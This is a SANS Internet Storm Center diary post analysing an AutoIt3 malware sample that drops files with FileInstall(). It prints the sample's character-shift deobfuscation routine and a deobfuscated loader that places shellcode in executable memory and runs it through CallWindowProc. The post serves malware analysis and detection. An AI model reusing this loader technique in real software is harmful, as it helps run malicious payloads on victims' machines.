AutoIT3[1<\/a>] is a powerful language that helps to built nice applications for Windows environments, mainly to automate tasks. If it looks pretty old, the latest version was released last September and it remains popular amongst developers, for the good\u2026 or the bad! Malware written in AutoIt3 has existed since the late 2000s, when attackers realized that the language was easy to learn (close to basic) but can also compiled into standalone PE files! From a malware point of view, such executables make an extended use of packed data, making them more stealthy.<\/p>\n If it became less popular, AutoIT3 is still used by some attackers. I found a sample yesterday that (ab)use a nice feature of the language. The sample was delivered in a ZIP archive, containing a PE fille: ENQ-2548871-PO-AYPC-352-25-UN-01162.exe (SHA256:1e75512b85b8ad27966ea850b69290bc18cc010bcb4f0e1ef119b82c99ca96c0). The file has a VT score of 33\/72[2<\/a>].<\/p>\n The technique used by the threat actor relies on the function FileInstall()[3<\/a>]. Its purpose is to to include a file into an executed script but\u2026 the behavior is subtle\u00a0and depends on how the script is run. The script call this code:<\/p>\n How does it work?<\/p>\n When the payload was executed, indeed, it created the file \u2018inhumation\u2019 in %TEMP%!<\/p>\n Clasically, the remaining code is obfuscated. The magic is perfomed\u00a0with a simple function LGYJSYH():<\/p>\n The purpose is very simple: it parses a string, and for every character, if converts it with the previous one in the ASCII table (-1). Don’t be fooled, the “^” does not reveal some XOR manipulation. In AutoIT, “^” is exponentiation!<\/p>\n In Python, we should have something like this:<\/p>\n Example:<\/p>\n Two files are loaded via FileInstall() and one of them is an obfuscated shellcode.<\/p>\n Here is the technique used by the sample to load and execute it: I already covered the use of CallWindowProc() to load a shell code in a previous diary[4<\/a>]<\/p>\n There is ongoing wave of such samples. I already spotted two samples that use the same technique:<\/p>\n Conclusion: Keep an eye on FileInstall() in AutoIT3 scripts!<\/p>\n [1] https:\/\/www.autoitscript.com\/site\/<\/a> Xavier Mertens (@xme) (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n \t\nFileInstall ( \"inhumation\" , @TempDir & \"inhumation\" , 1 )<\/pre>\n
\n
\nFunc LGYJSYH ( $LVRVBGKY )\n Local $PYYTLPGF = \"\"\n For $WVILGLOS = 1 To StringLen ( $LVRVBGKY )\n Local $NCMTXMB = Asc ( StringMid ( $LVRVBGKY , $WVILGLOS , 1 ) )\n $PYYTLPGF &= Chr ( $NCMTXMB - ( 1 ^ $WVILGLOS ) )\n Next\n Return $PYYTLPGF\nEndFunc<\/pre>\n
\ndef LGYJSYH(s):\n return \"\".join(chr(ord(c) - 1) for c in s)<\/pre>\n
\n>>> def OZTTVUH(s):\n... return \"\".join(chr(ord(c) - 1) for c in s)\n...\n>>> OZTTVUH(\"lfsofm43\")\n'kernel32'<\/pre>\n
![\"\"](\"https:\/\/i0.wp.com\/isc.sans.edu\/diaryimages\/images\/isc-20251205-1%281%29.png?ssl=1\")
<\/p>\n
\n(The code has been deobfuscated for easier reading)<\/p>\n\n; Unpack the shellcode on disk\nFileInstall ( \"buncal\" , @TempDir & \"buncal\" , 1 )\n\n; Read the shellcode file content\n$FMMKSJE = Execute ( \"lgyjsyh(FileRead(@TempDir \u201c\u201dbuncal\"))\" )\n\n; Get the shellcode length\n$IXWCTFHCT = BinaryLen ( $FMMKSJE )\n\n; Allocate executable memorty (0x40) to contain the shellcode\n$PUJFJJN = DllCall ( \u201ckernel32\u201d , \u201cptr\u201d, \u201cVirtualAlloc\u201d, \u201cdword\" , \u201c0\u201d , \u201cdword\u201d, $IXWCTFHCT, \u201cdword\u201d, \u201c0x3000\u201d, \u201cdword\u201d, \u201c0x40\u201d))[0]\n\n; Prepate the allocated memory as a DLL structure\n$QMDAZCZGFO = DllStructCreate ( \u201cbyte [\u201c & $IXWCTFHCT & \u201c]\u201d ) , $PUJFJJN )\n\n; Loads the shellcode in memory\nDllStructSetData ( $QMDAZCZGFO , 1 , $FMMKSJE )\n\n; Launch the shellcode!\nDllCall ( \u201cuser32.dll\u201d , \u201cptr\u201d, \u201cCallWindowProc\u201d, \u201cptr\u201d, $PUJFJJN + 9296 , \u201cptr\u201d, 0 , \u201cptr\u201d,, 0 , \u201cptr\u201d, 0 , \u201cptr\u201d, 0 )<\/pre>\n
\n
\n
\n
\n[2] https:\/\/www.virustotal.com\/gui\/file\/1e75512b85b8ad27966ea850b69290bc18cc010bcb4f0e1ef119b82c99ca96c0<\/a>
\n[3] https:\/\/www.autoitscript.com\/autoit3\/docs\/functions\/FileInstall.htm<\/a>
\n[4] https:\/\/isc.sans.edu\/diary\/Interesting+Technique+to+Launch+a+Shellcode\/32238<\/a><\/p>\n
\nXameco
\nSenior ISC Handler – Freelance Cyber Security Consultant
\nPGP Key<\/a><\/p>\n
\n
<\/BR><\/p>\n